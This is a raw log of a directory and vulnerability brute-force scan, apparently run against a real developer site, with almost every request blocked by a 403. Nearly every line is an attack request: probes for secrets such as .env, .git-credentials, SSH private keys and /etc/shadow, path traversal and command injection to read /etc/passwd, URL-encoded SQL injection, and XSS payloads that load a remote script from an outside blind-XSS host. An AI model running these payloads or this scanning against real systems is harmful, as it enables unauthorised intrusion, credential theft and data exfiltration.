/!.htpasswd           (Status: 403) [Size: 15500]
/!.htaccess           (Status: 403) [Size: 15500]
/.                    (Status: 200) [Size: 27015]
/.DS_Store            (Status: 403) [Size: 15152]
/.adm                 (Status: 403) [Size: 15133]
/.bak                 (Status: 403) [Size: 15133]
/.bash_history        (Status: 403) [Size: 15193]
/.bashrc              (Status: 403) [Size: 15167]
/.bzr/branch-format   (Status: 403) [Size: 15237]
/.c9/metadata/environment/.env (Status: 403) [Size: 15313]
/.bzr/readme          (Status: 403) [Size: 15207]
/.docker/.env         (Status: 403) [Size: 15188]
/.docker/laravel/app/.env (Status: 403) [Size: 15589]
/.ds_store            (Status: 403) [Size: 15152]
/.env                 (Status: 403) [Size: 15133]
/.git                 (Status: 403) [Size: 15133]
/.git/branches/       (Status: 403) [Size: 15223]
/.git/                (Status: 403) [Size: 15138]
/.git/commit_editmsg  (Status: 403) [Size: 15244]
/.git/config          (Status: 403) [Size: 15186]
/.git/configf         (Status: 403) [Size: 15509]
/.git/description     (Status: 403) [Size: 15252]
/.git/head            (Status: 403) [Size: 15475]
/.git/fetch_head      (Status: 403) [Size: 15501]
/.git/hooks/          (Status: 403) [Size: 15488]
/.git/index           (Status: 403) [Size: 15503]
/.git-credentials     (Status: 403) [Size: 289]
/.git-rewrite/        (Status: 403) [Size: 289]
/.git/info/           (Status: 403) [Size: 15186]
/.git/info/attributes (Status: 403) [Size: 15250]
/.git/info/exclude    (Status: 403) [Size: 15215]
/.git/logs/           (Status: 403) [Size: 15485]
/.git/logs/refs/heads (Status: 403) [Size: 15552]
/.git/logs/head       (Status: 403) [Size: 15500]
/.git/logs/refs       (Status: 403) [Size: 15522]
/.git/logs/refs/heads/master (Status: 403) [Size: 15626]
/.git/logs/refs/remotes (Status: 403) [Size: 15583]
/.git/logs/refs/remotes/origin (Status: 403) [Size: 15614]
/.git/logs/refs/remotes/origin/head (Status: 403) [Size: 15683]
/.git/logs/refs/remotes/origin/master (Status: 403) [Size: 15668]
/.git/objects/        (Status: 403) [Size: 15519]
/.git/refs/heads/master (Status: 403) [Size: 15583]
/.git/refs/remotes    (Status: 403) [Size: 15514]
/.git/refs/heads      (Status: 403) [Size: 15504]
/.git/packed-refs     (Status: 403) [Size: 15508]
/.git/refs/           (Status: 403) [Size: 15506]
/.git/refs/remotes/origin (Status: 403) [Size: 15589]
/.git/refs/remotes/origin/head (Status: 403) [Size: 15636]
/.git/refs/remotes/origin/master (Status: 403) [Size: 15347]
/.github/issue_template.md (Status: 403) [Size: 15569]
/.github/pull_request_template.md (Status: 403) [Size: 15619]
/.git/refs/tags       (Status: 403) [Size: 15501]
/.github/workflows/blank.yml (Status: 403) [Size: 15620]
/.github/             (Status: 403) [Size: 15472]
/.github/workflows/dependabot.yml (Status: 403) [Size: 15642]
/.github/workflows/ci.yml (Status: 403) [Size: 15565]
/.github/workflows/docker.yml (Status: 403) [Size: 15606]
/.github/workflows/master.yml (Status: 403) [Size: 15627]
/.github/workflows/maven.yml (Status: 403) [Size: 15620]
/.github/workflows/publish.yml (Status: 403) [Size: 15630]
/.github/workflows/nodejs.yml (Status: 403) [Size: 15627]
/.gitlab-ci.off.yml   (Status: 403) [Size: 289]
/.gitlab-ci/.env      (Status: 403) [Size: 15501]
/.gitchangelog.rc     (Status: 403) [Size: 289]
/.git2/               (Status: 403) [Size: 289]
/.hg/                 (Status: 403) [Size: 15136]
/.hg/branch           (Status: 403) [Size: 15183]
/.hg/dirstate         (Status: 403) [Size: 15189]
/.hg/hgrc             (Status: 403) [Size: 15173]
/.hg/store/data/      (Status: 403) [Size: 15528]
/.hg/requires         (Status: 403) [Size: 15509]
/.hg/store/undo       (Status: 403) [Size: 15202]
/.hg/undo.dirstate    (Status: 403) [Size: 15212]
/.history             (Status: 403) [Size: 15469]
/.htaccess            (Status: 403) [Size: 15173]
/.htaccess.bak        (Status: 403) [Size: 15193]
/.htaccess.old        (Status: 403) [Size: 15214]
/.htpasswd            (Status: 403) [Size: 15152]
/.idea/               (Status: 403) [Size: 15142]
/.idea/.name          (Status: 403) [Size: 15186]
/.idea/assetwizardsettings (Status: 403) [Size: 15270]
/.idea/compiler       (Status: 403) [Size: 15199]
/.idea/caches/build_file_checksums.ser (Status: 403) [Size: 15367]
/.idea/copyright/profiles_settings (Status: 403) [Size: 15667]
/.idea/datasources    (Status: 403) [Size: 15532]
/.idea/datasources.ids (Status: 403) [Size: 15549]
/.idea/datasources.local (Status: 403) [Size: 15281]
/.idea/deployment     (Status: 403) [Size: 15209]
/.idea/dictionaries   (Status: 403) [Size: 15237]
/.idea/gradle         (Status: 403) [Size: 15488]
/.idea/httprequests   (Status: 403) [Size: 15557]
/.idea/encodings      (Status: 403) [Size: 15522]
/.idea/drush_stats.iml (Status: 403) [Size: 15549]
/.idea/libraries      (Status: 403) [Size: 15501]
/.idea/inspectionprofiles/project_default (Status: 403) [Size: 15679]
/.idea/libraries/     (Status: 403) [Size: 15532]
/.idea/misc           (Status: 403) [Size: 15482]
/.idea/runconfigurations (Status: 403) [Size: 15559]
/.idea/modules        (Status: 403) [Size: 15495]
/.idea/naveditor      (Status: 403) [Size: 15522]
/.idea/replstate      (Status: 403) [Size: 15522]
/.idea/scopes/scope_settings (Status: 403) [Size: 15321]
/.idea/tasks          (Status: 403) [Size: 15506]
/.idea/sqldatasources (Status: 403) [Size: 15567]
/.idea/sites.iml      (Status: 403) [Size: 15522]
/.idea/vcs            (Status: 403) [Size: 15475]
/.idea/workspace      (Status: 403) [Size: 15501]
/.idea/webservers     (Status: 403) [Size: 15529]
/.idea/woawordpress.iml (Status: 403) [Size: 15556]
/.idea/workspace(3)   (Status: 403) [Size: 15536]
/.idea/workspace(2)   (Status: 403) [Size: 15556]
/.idea/workspace(6)   (Status: 403) [Size: 15557]
/.idea/workspace(4)   (Status: 403) [Size: 15536]
/.idea/workspace(5)   (Status: 403) [Size: 15535]
/.idea/workspace(7)   (Status: 403) [Size: 15557]
/.idea/uidesigner     (Status: 403) [Size: 15208]
/.mysql_history       (Status: 403) [Size: 15196]
/.old                 (Status: 403) [Size: 15133]
/.passwd              (Status: 403) [Size: 15167]
/.profile             (Status: 403) [Size: 15170]
/.psql_history        (Status: 403) [Size: 15193]
/.ssh/authorized_keys (Status: 403) [Size: 15247]
/.ssh/id_dsa          (Status: 403) [Size: 15207]
/.ssh/id_rsa          (Status: 403) [Size: 15207]
/.svn/wc.db           (Status: 403) [Size: 15183]
/.temp                (Status: 403) [Size: 15136]
/.tmp                 (Status: 403) [Size: 15154]
/.viminfo             (Status: 403) [Size: 15170]
/.vscode/.env         (Status: 403) [Size: 15210]
/1914_Elgin.old       (Status: 403) [Size: 15217]
/2009.bak             (Status: 403) [Size: 15149]
/InstallWeb.config    (Status: 403) [Size: 15230]
/Web.Config           (Status: 403) [Size: 15201]
/Web.config           (Status: 403) [Size: 15201]
/_.htpasswd           (Status: 403) [Size: 15180]
/_data/error_log      (Status: 403) [Size: 15201]
/_log/access_log      (Status: 403) [Size: 15181]
/_log/error_log       (Status: 403) [Size: 15178]
/_logs/access_log     (Status: 403) [Size: 15230]
/_phpinfo.php         (Status: 403) [Size: 15185]
/_s_/dyn/log_highlight?href=../../../../windows/win&n=1#selected (Status: 403) [Size: 4516]
/a485f48d65772f784ffec2ce690d0dd5.tmp (Status: 403) [Size: 15354]
/access.log           (Status: 403) [Size: 15180]
/access_log           (Status: 403) [Size: 15180]
/admin-app/.env       (Status: 403) [Size: 15220]
/admin.old            (Status: 403) [Size: 15173]
/admin/.htaccess      (Status: 403) [Size: 15202]
/admin/_logs/access_log (Status: 403) [Size: 15580]
/admin/_logs/error_log (Status: 403) [Size: 15253]
/admin/access_log     (Status: 403) [Size: 15209]
/admin/error_log      (Status: 403) [Size: 15202]
/admin/logs/access_log (Status: 403) [Size: 15232]
/admin/logs/error_log (Status: 403) [Size: 15249]
/admin/overview?qcustompivot="><script>prompt(‘xss’)</script> (Status: 403) [Size: 15581]
/admin/roxyfileman/processrequest?a=renamedir&d=%2fimages%2fuploaded%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2finetpub%2fwwwroot%2fnopcommerce%2fviews%2fcommon%2f&n=common2 (Status: 403) [Size: 4516]
/admin/roxyfileman/processrequest?a=createdir&d=%2fimages%2fuploaded%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2finetpub%2fwwwroot%2fnopcommerce%2fviews%2f&n=common (Status: 403) [Size: 4516]
/administrator/.htaccess (Status: 403) [Size: 15281]
/albums.old           (Status: 403) [Size: 15180]
/am/login,loginform.sdirect?formids=textfield%2ctextfield_0%2clink&submitmode=&submitname=&textfield=%3cscript%3ealert(1)%3c%2fscript%3e&textfield_0=l0v%21i1s%21c2 (Status: 403) [Size: 16245]
/amember/admin/access_log (Status: 403) [Size: 15287]
/answers/error_log    (Status: 403) [Size: 15212]
/apache/logs/access_log (Status: 403) [Size: 15281]
/apache/logs/error_log (Status: 403) [Size: 15253]
/api/.env             (Status: 403) [Size: 15151]
/api/error_log        (Status: 403) [Size: 15196]
/api/upload?action=filemgr&dirpath=%2f..%2f..%2fcustom%2fthemes%2frce_test (Status: 403) [Size: 4516]
/api/v1/fs/..%2f..%2fetc/passwd (Status: 403) [Size: 15319]
/app/.env             (Status: 403) [Size: 15152]
/app/.htaccess        (Status: 403) [Size: 15217]
/apps/.env            (Status: 403) [Size: 15154]
/apps/email/index?n="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15618]
/apps/email/index?n="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15676]
/apps/email/index?n=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15988]
/aptana/tools/sourceviewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd (Status: 403) [Size: 4516]
/archives.bak         (Status: 403) [Size: 15207]
/ask.bak              (Status: 403) [Size: 15146]
/assets               (Status: 301) [Size: 337] [--> http://developers.cloudways.com/assets/]
/assets/file:%2f%2f/etc/passwd (Status: 403) [Size: 15292]
/astracker.old        (Status: 403) [Size: 15193]
/authorized_keys      (Status: 403) [Size: 15220]
/awstats.old          (Status: 403) [Size: 15204]
/back/.env            (Status: 403) [Size: 15155]
/badging/badge_template_v0?layout=<script>confirm('xss')</script> (Status: 403) [Size: 15578]
/bb.old               (Status: 403) [Size: 15139]
/bbs.old              (Status: 403) [Size: 15146]
/bin.bak              (Status: 403) [Size: 15167]
/bin.old              (Status: 403) [Size: 15146]
/bitrix/web.config    (Status: 403) [Size: 15212]
/blog.old             (Status: 403) [Size: 15149]
/blog/error_log       (Status: 403) [Size: 15199]
/book.bak             (Status: 403) [Size: 15149]
/cache.old            (Status: 403) [Size: 15173]
/cart.php.bak         (Status: 403) [Size: 15186]
/category/xxx%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2d%2d%20%2d (Status: 403) [Size: 17497]
/categorysearch?cateid=<script>alert(1)</script> (Status: 403) [Size: 15479]
/cgi-bin.bak          (Status: 403) [Size: 15204]
/cgi-bin.old          (Status: 403) [Size: 15183]
/cgi-bin/betsie/parserl.pl/<script>alert( (Status: 403) [Size: 15410]
/cgi-bin/cgiserver.exx?command=dumpconfigfile(/etc/shadow) (Status: 403) [Size: 15497]
/cgi-bin/db4web_c/dbdirname/etc/hosts (Status: 403) [Size: 15366]
/cgi-bin/maconomy/maconomyws.macx1.w_mcs//etc/passwd (Status: 403) [Size: 15477]
/cgi-bin/w3-msql/protected-directory/.htpasswd (Status: 403) [Size: 15445]
/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("xss")</script>) (Status: 403) [Size: 16389]
/cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> (Status: 403) [Size: 15867]
/cgi.bak              (Status: 403) [Size: 15146]
/cgi/vqrespond.pl<script>alert( (Status: 403) [Size: 15357]
/chat.old             (Status: 403) [Size: 15149]
/chkisg.htm%3fsip%3d1.1.1.1%20%7c%20cat%20%2fetc%2fpasswd (Status: 403) [Size: 15506]
/cms/web.config       (Status: 403) [Size: 15199]
/cmssite/post?post=1%20and%20(sleep(10)) (Status: 403) [Size: 15370]
/command?cat%20/etc/passwd (Status: 403) [Size: 15294]
/commany.bak          (Status: 403) [Size: 15204]
/conf&log=/etc/passwd&noih=no&frames=y (Status: 403) [Size: 15367]
/config.inc           (Status: 403) [Size: 15199]
/connect.inc          (Status: 403) [Size: 15183]
/connexion?redirect_uri="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15632]
/connexion?redirect_uri="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15707]
/connexion?redirect_uri=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15699]
/content?expand="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15574]
/content?expand="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15629]
/content?expand=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15646]
/core/.env            (Status: 403) [Size: 15155]
/cp/.env              (Status: 403) [Size: 15149]
/dead.letter          (Status: 403) [Size: 15202]
/default.html.old     (Status: 403) [Size: 15226]
/demo-servlets/%2fweb-inf/config/mishka.properties (Status: 403) [Size: 15464]
/development/.env     (Status: 403) [Size: 15230]
/docker/.env          (Status: 403) [Size: 15186]
/docs                 (Status: 301) [Size: 335] [--> http://developers.cloudways.com/docs/]
/docs/                (Status: 200) [Size: 31455]
/empsearch.cc?operation=getsearchresult&request_type=json&searchstring=rr<svg%2fonload%3dprompt(8)>&searchtype=contains&searchby=all_fields&actionid=search (Status: 403) [Size: 16203]
/en/telefon-cam?search="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15686]
/en/telefon-cam?search="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15628]
/en/telefon-cam?search=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15699]
/error.log            (Status: 403) [Size: 15173]
/error_log            (Status: 403) [Size: 15152]
/etc/hosts            (Status: 403) [Size: 15155]
/etc/mysql/my.cnf     (Status: 403) [Size: 15212]
/etc/passwd           (Status: 403) [Size: 15183]
/etc/services/inet/inet4_dhcpc_helper (Status: 403) [Size: 15363]
/etc/services/inet/inet_ipv4 (Status: 403) [Size: 15323]
/etc/shadow           (Status: 403) [Size: 15482]
/events_edit?id=%2d%32%33%36%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31111%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d (Status: 403) [Size: 16591]
/examples.html        (Status: 200) [Size: 6566]
/favicon.ico          (Status: 200) [Size: 5430]
/firms/?text="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15564]
/firms/?text=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15636]
/firms/?text="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15619]
/forums.bak           (Status: 403) [Size: 15201]
/forums.old           (Status: 403) [Size: 15479]
/gitlab/build_now%3csvg/onload=alert(document.domain)%3e (Status: 403) [Size: 15487]
/global-protect/login.esp?server=&prot=&passwd=&inputstr=&action=&ok=ok%3dlog+in&user=36483%22%3balert(document.domain)%2f%2f811krqsdt (Status: 403) [Size: 16057]
/global.asa.temp      (Status: 403) [Size: 15199]
/global.asa.tmp       (Status: 403) [Size: 15196]
/global.asax.temp     (Status: 403) [Size: 15206]
/global.asax.tmp      (Status: 403) [Size: 15498]
/global.bak           (Status: 403) [Size: 15180]
/home/$user/.bash_history (Status: 403) [Size: 15266]
/home/$user/.ssh/id_rsa (Status: 403) [Size: 15263]
/html.bak             (Status: 403) [Size: 15170]
/html.old             (Status: 403) [Size: 15170]
/httpd/logs/access_log (Status: 403) [Size: 15253]
/httpd/logs/error_log (Status: 403) [Size: 15271]
/id_dsa               (Status: 403) [Size: 15160]
/id_rsa               (Status: 403) [Size: 15118]
/index.html           (Status: 200) [Size: 27015]
/index.html.bak       (Status: 403) [Size: 15217]
/index.html.old       (Status: 403) [Size: 15217]
/index.old            (Status: 403) [Size: 15131]
/index.php.old        (Status: 403) [Size: 15210]
/index.php.bak        (Status: 403) [Size: 15192]
/index/%22%3c/a%3e%3cscript%3ealert(document.cookie)%3c/script%3e (Status: 403) [Size: 15572]
/index/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backto=dashboard (Status: 403) [Size: 20949]
/index/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20as+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense (Status: 403) [Size: 20801]
/install.bak          (Status: 403) [Size: 15204]
/installation.old     (Status: 403) [Size: 15206]
/interface/registercustomer/onlineregfailure?cn=gar&result=</font><script>alert(1);</script><font> (Status: 403) [Size: 15864]
/interface/registerclient/onlineregfailure?cn=gar&result=</font><script>alert(1);</script><font> (Status: 403) [Size: 15833]
/interface/registerreseller/onlineregfailure?cn=gar&result=</font><script>alert(1);</script><font> (Status: 403) [Size: 15885]
/interface/registercustomer/onlineregsuccess?cn=</font><script>alert(1);</script><font>&result= (Status: 403) [Size: 15830]
/javascript           (Status: 301) [Size: 341] [--> http://developers.cloudways.com/javascript/]
/javax.faces.resource.../web-inf/webf (Status: 403) [Size: 15381]
/lang/web.config      (Status: 403) [Size: 15202]
/lib.old              (Status: 403) [Size: 15145]
/log/access_log       (Status: 403) [Size: 15198]
/log/error_log        (Status: 403) [Size: 15196]
/login?redirect_uri="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15612]
/login?redirect_uri="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15669]
/login?referer=%22%3e%3cscript%3ealert('cinta%20infinita')%3c/script%3e (Status: 403) [Size: 15593]
/login?redirect_uri=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15662]
/logs/error_log       (Status: 403) [Size: 15220]
/main.js              (Status: 200) [Size: 174]
/member.bak           (Status: 403) [Size: 15201]
/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms:// (Status: 403) [Size: 15779]
/modules/web.config   (Status: 403) [Size: 15237]
/news.old             (Status: 403) [Size: 15170]
/news/class/index?myord="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15638]
/news/class/index?myord="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15713]
/news/class/index?myord=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15705]
/news/class/index?myshownums="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15678]
/news/class/index?myshownums="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15735]
/news/class/index?myshownums=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 16070]
/nicknames.bak        (Status: 403) [Size: 15193]
/nohup.out            (Status: 403) [Size: 15131]
/opencms/system/workplace/views/explorer/tree_fs?type=</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite= (Status: 403) [Size: 16270]
/pages?id=2%27%20and%20(select%204588%20from(select%20count(*),concat(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)--%20- (Status: 403) [Size: 16537]
/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- (Status: 403) [Size: 16266]
/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+- (Status: 403) [Size: 16249]
/phamm/main/%22%3e%3cscript%3ealert%28123%29%3c/script%3e (Status: 403) [Size: 15494]
/php/save/savedescriptions?dashid=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2d (Status: 403) [Size: 18061]
/php_error_log        (Status: 403) [Size: 15214]
/phpinfo.php          (Status: 403) [Size: 15204]
/phpmyvistes/aaa/b<script>alert(document.location)</script> (Status: 403) [Size: 15599]
/plan_du_site?lang="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15663]
/plan_du_site?lang="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15588]
/plan_du_site?lang=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15659]
/platinum/platformsettingedit?type=>"><script>alert("xxs poc")</script> (Status: 403) [Size: 15634]
/play                 (Status: 301) [Size: 335] [--> http://developers.cloudways.com/play/]
/plugins/web.config   (Status: 403) [Size: 15258]
/plus/pass_reset?l=english&pmc_username="><script>alert('xss')</script> (Status: 403) [Size: 15608]
/pplay/info_prenotazioni?immagine="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15774]
/pplay/info_prenotazioni?immagine="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15677]
/pplay/info_prenotazioni?immagine=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15770]
/printenv.tmp         (Status: 403) [Size: 15206]
/private/.env         (Status: 403) [Size: 15189]
/proc/self/environ    (Status: 403) [Size: 15215]
/products.old         (Status: 403) [Size: 15207]
/products?handler="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15658]
/products?handler=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15652]
/products?handler="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15584]
/property/search?uid="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15643]
/property/search?uid="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15697]
/property/search?uid=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15710]
/publicus.ini.bak     (Status: 403) [Size: 15206]
/purchaserequest.do?operation=getassociatedprsforsr&servicerequestid=g24aj%3cimg%20src%3da%20onerror%3dalert(%27xss%27)%3eqdaxl (Status: 403) [Size: 15979]
/reports/rwservlet/showenv%22%3e%3cimg%20src=x%20onerror=prompt(1);%3e (Status: 403) [Size: 15609]
/rest/.env            (Status: 403) [Size: 15155]
/script%3e%3c/script%3e&ext=somev (Status: 403) [Size: 15320]
/scripts/wa.exe?ok=<svg/onload=%26%23097lert%26lpar;'mtk')> (Status: 403) [Size: 15536]
/search-results?q="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15584]
/search-results?q=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15673]
/search-results?q="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15681]
/search.html?searchscope="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15635]
/search.html?searchscope="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15710]
/search.html?searchscope=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15727]
/search.php           (Status: 500) [Size: 0]
/searchn.do?searchtext=a&selectedsiteid=1&selectedsitename=&configid=0&selectsite=qc_siteid&submitbutton=go&userconfigid=21111111ucgol"><img src%3da onerror%3dalert('xss')>qzmm3u7id8z&selectname=site (Status: 403) [Size: 16501]
/servlet/combsoft.jtf.core.sg?code="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15743]
/servlet/combsoft.jtf.core.sg?code="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15802]
/servlet/combsoft.jtf.core.sg?code=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 16071]
/servlet/combsoft.jtf.core.sg?objet="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 16049]
/servlet/combsoft.jtf.core.sg?objet="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15805]
/servlet/combsoft.jtf.core.sg?objet=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15776]
/shared/lgflsearch?terms="><script src=https://vijay922.xss.ht></script> (Status: 403) [Size: 15958]
/shared/lgflsearch?terms=%22%3e%3cscript%20src=https://vijay922.xss.ht%3e%3c/script%3e (Status: 403) [Size: 15708]
/shared/lgflsearch?terms="><script+src%3dhttps%3a%2f%2fvijay922.xss.ht><%2fscript> (Status: 403) [Size: 15713]
/simploo/config/custom/base?x=phpinfo%28%29; (Status: 403) [Size: 15418]
/sitelookup.do?configid=0&selectsite=qc_siteid"/><svg onload=alert('xss')>&userconfigid=21111111&selectedsiteid=1&selectedsitename= (Status: 403) [Size: 16040]
/sitemap.html.bak     (Status: 403) [Size: 15185]
/sitemap.xml.old      (Status: 403) [Size: 15198]
/soapserver/1%3cscript%3eprompt(923395)%3c/script%3e (Status: 403) [Size: 15468]
/solutionsearch.do?searchtext=1'%3balert('xss')%2f%2f706z8rz68&selectname=solutions (Status: 403) [Size: 15684]
/someapp/javax.faces.resource.../web-inf/webf (Status: 403) [Size: 15442]
/someapp/javax.faces.resource./web-inf/webf (Status: 403) [Size: 15411]
/sources/.env         (Status: 403) [Size: 15168]
/svn-commit.2.tmp     (Status: 403) [Size: 15206]
/svn-commit.tmp       (Status: 403) [Size: 15196]
/text-base/etc/passwd (Status: 403) [Size: 15250]
/tmp/access_log       (Status: 403) [Size: 15198]
/tmp/error_log        (Status: 403) [Size: 15195]
/tmui/login/..;/tmui/locallb/workspace/fileread?filename=/etc/passwd (Status: 403) [Size: 15622]
/v1.bak               (Status: 403) [Size: 15160]
/var/log/             (Status: 403) [Size: 15155]
